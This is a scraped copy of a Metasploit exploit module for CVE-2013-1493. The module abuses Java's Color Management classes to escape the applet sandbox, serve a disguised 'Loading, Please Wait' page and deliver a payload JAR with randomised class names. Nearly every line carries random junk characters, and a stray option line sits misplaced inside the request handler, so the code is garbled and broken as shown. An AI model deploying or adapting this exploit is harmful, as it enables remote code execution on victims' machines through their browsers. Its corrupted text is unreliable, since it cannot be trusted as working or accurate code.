##
s( I6 x" L+ T( f7 a3 s: x& @& y* S( h# M+ w: s5 j1 n
# This file is part of the Metasploit Framework and may be subject to
; ?8 Q( s/ q& j% _% A# redistribution and commercial restrictions. Please see the Metasploit% A7 U0 y) }1 R( Y" F: ]$ T
# web site for more information on licensing and terms of use.
0 `# J% H" b0 {8 j2 N# http://metasploit.com/- ~$ X- u/ C8 F1 e8 g; B3 r
## Z3 B4 E7 m9 ?+ x4 h8 U9 E* U
require ‘msf/core’
/ r6 }8 i+ \" I. W/ m! x% Jrequire ‘rex’: f0 {2 {2 ?) @
class Metasploit3 < Msf::Exploit::Remote
8 {/ A, i7 S$ P4 s" D: vRank = NormalRanking+ M, Q6 q$ D2 }9 S, Y3 Y% g
include Msf::Exploit::Remote::HttpServer::HTML
2 m: V1 d9 r& j3 H5 o8 C* Linclude Msf::Exploit::EXE
2 C" s8 H0 M. O+ |9 \3 [$ _include Msf::Exploit::Remote::BrowserAutopwn
5 g. b3 V# {+ t f# Jautopwn_info({ :javascript => false })
: S6 k. V7 i) f( F! D- Edef initialize( info = {} )$ P8 L: s; N6 e& s( a
super( update_info( info,, a; j! b# f% q @- J& G) U+ Q( C
‘Name’ => ‘Java CMM Remote Code Execution’,; Q! ]- P; `' x& w
‘Description’ => %q{
1 a: {' c5 ?* h+ \# |4 J. TThis module abuses the Color Management classes from a Java Applet to run% T5 z) U2 _/ |$ a4 s2 a
arbitrary Java code outside of the sandbox as exploited in the wild in February
7 Z- P- D9 \/ p' P) cand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
$ Q2 V/ b; P# P; d- Vand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
" o3 \: `8 b6 n% h/ nsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java
* b9 L8 L9 R, Qwarning in order to run the malicious applet.
& ^1 W' J7 v( l8 q},( X1 |/ b. r) H: F1 M
‘License’ => MSF_LICENSE,
, ^5 I% }( y, \ a* x/ \6 v0 g‘Author’ =>& z! f$ D+ E* H
'Unknown', # Vulnerability discovery and Exploit
. \9 ]4 `0 A9 ~7 {/ m2 z/ q'juan vazquez' # Metasploit module (just ported the published exploit)
1 T _5 e6 ?6 U4 I" ]: D],
. ?1 E' F* }7 V‘References’ =>1 a8 ?3 ]: R, s# Y7 D& Z. ^8 c) l/ q9 ^
[+ h. i" C5 z1 z6 p7 g+ d2 v6 T- a
[ 'CVE', '2013-1493' ],0 _6 J4 H! H3 Y: ~0 h
[ 'OSVDB', '90737' ],9 u+ T+ |" Y& n0 e1 g% C! s+ a
[ 'BID', '58238' ],( v2 A- }6 V' z$ H9 f
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
- L6 Q. j: S0 X9 N[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],0 v& c) i* D3 X6 d2 `& ^$ j, O
[ 'URL', 'http://pastie.org/pastes/6581034' ]
0 q; e2 S$ c; m' \3 `% _5 q: q],6 i# @& x O; [" w, i
‘Platform’ => [ 'win', 'java' ],- _! F6 H- P3 l: Q5 F2 O
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true }, e# p; }' v6 G g
‘Targets’ =>8 L* _- n! F; p6 t/ V2 g
[
; S6 i5 J C: A; R[ 'Generic (Java Payload)',
2 i2 ]. ?$ K; n{
/ _$ C% f$ O9 d1 i" ~4 {'Platform' => 'java',& a' q6 [( A8 E* J0 i6 p. v. f
'Arch' => ARCH_JAVA
/ F$ x: p$ {+ r# {* C}
D) D/ _0 p* z/ ~],# Q' d' X3 V; e
[ 'Windows x86 (Native Payload)',
$ M$ r% k4 T% `& z( L9 R' ^{
: V% q( f1 s- G# Q, s: s9 {'Platform' => 'win',
( R8 a; v9 h+ j! Q9 h* ]'Arch' => ARCH_X86* q, Z4 u" t: {7 d; e
}) q! O0 y/ F/ m, g# U K9 v' \' [
]6 X6 |: o% b1 O' Y
],; h* M# b9 {0 D1 u& j
‘‘DisclosureDate’ => ‘Mar 01 2013′* I8 g( p, q0 Y/ L
))
- R4 m+ C0 i- n8 m& @* Lend+ N# T9 w8 j: b9 v7 V
def setup1 } Q+ ?% h1 G- y
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”), o9 g( R3 l" D! |; U
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }" {4 F9 C: X9 n9 t
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
1 ~9 N( h5 ?* J/ c+ K. i@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
% l# {* h% x R: t& b! Dpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
0 m4 D5 }* i7 M1 W4 w2 h1 Q$ O! ]@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }) {2 ~' [( o8 r0 d) E+ O: K) f9 \
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)1 P4 ?1 [# W% M ~; r
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }1 d$ ? B# R. @4 R
@init_class_name = rand_text_alpha(“Init”.length)# G! n" h' ?, S; S
@init_class.gsub!(“Init”, @init_class_name)" C1 H; l5 k: j. ]' } H3 ^
super
4 p5 Z t/ E3 k8 d2 F! I' Dend
; h: j; @2 `2 F' edef on_request_uri(cli, request)
) v, c% ?7 h2 ^) f& Tprint_status(“handling request for #{request.uri}”)
+ Q/ O: _, ]6 H' Y8 ]4 Q# gcase request.uri
0 ~+ [7 o: q( J+ dwhen /\.jar$/i4 R) Z Z5 h2 I: O
jar = payload.encoded_jar6 p# J1 p0 r% ^5 b! J+ Z
jar.add_file(“#{@init_class_name}.class”, @init_class)9 A8 i6 c$ b8 o1 P
jar.add_file(“Leak.class”, @leak_class)* d+ Z% N1 c+ x+ F/ x
jar.add_file(“MyBufferedImage.class”, @buffered_image_class): U2 o* X2 ?9 n: `" z) u `
jar.add_file(“MyColorSpace.class”, @color_space_class)5 J1 {9 n6 u7 ]1 A* ]# g- D
DefaultTarget’ => 1,
& b) ` o0 a; {metasploit_str = rand_text_alpha(“metasploit”.length)
% o% ]- t: g# epayload_str = rand_text_alpha(“payload”.length)1 o' v3 p% L1 G
jar.entries.each { |entry|; s; o7 T6 n6 |
entry.name.gsub!(“metasploit”, metasploit_str)
& D& T, ]* Q! F" O( Yentry.name.gsub!(“Payload”, payload_str)
3 Q$ S, A! @: }4 b! ~entry.data = entry.data.gsub(“metasploit”, metasploit_str)
1 h- m# A& P* e9 Hentry.data = entry.data.gsub(“Payload”, payload_str)
, e4 T; g# l7 w. a" t, s1 U}
: L; x! a8 I1 Q3 Z/ b Yjar.build_manifest
5 Y2 R! ~) I% ?send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” }) ^8 t( Y6 n' N, [( M
when /\/$/, z, z3 X4 Z# j: W5 y6 H. u7 r1 A
payload = regenerate_payload(cli)
! @7 H) {$ Z5 H) D8 x/ Fif not payload
0 Y. k+ w, q9 _$ W0 Mprint_error(“Failed to generate the payload.”)
" ~+ b+ F8 C' n. Y# K. D, Qsend_not_found(cli)9 r3 r, H/ E6 N7 v3 r
return
- A3 Z# s0 Y6 g4 T4 O! send
" k; J6 w+ H, \2 v6 v( C) F; Gsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })( | k4 }) e2 [
else6 f- n. N5 B! W# F
send_redirect(cli, get_resource() + ‘/’, ”)5 v1 B* T: t G3 y @* y, D, r
end
$ h! c# ~" B' O' C; o: Iend. R7 z5 @5 F6 S0 c
def generate_html0 `$ ]# G$ O, l% e/ _, P. G0 |
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
1 h' z3 Z8 v0 }. \3 ` b$ D" {9 _html += %Q|<body><center><p>Loading, Please Wait…</p></center>|$ U3 Y3 [. s# l
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
2 E3 o8 Q F/ c, \ @html += %Q|</applet></body></html>|% i6 @; A# f1 A$ h$ O, m2 v
return html
7 x( f7 h4 g% X. H6 o# send! n! @2 |6 J& J$ x+ s4 y
end1 w* M8 n, C9 G2 h
end
* Z! J) U1 }7 D- `2 U |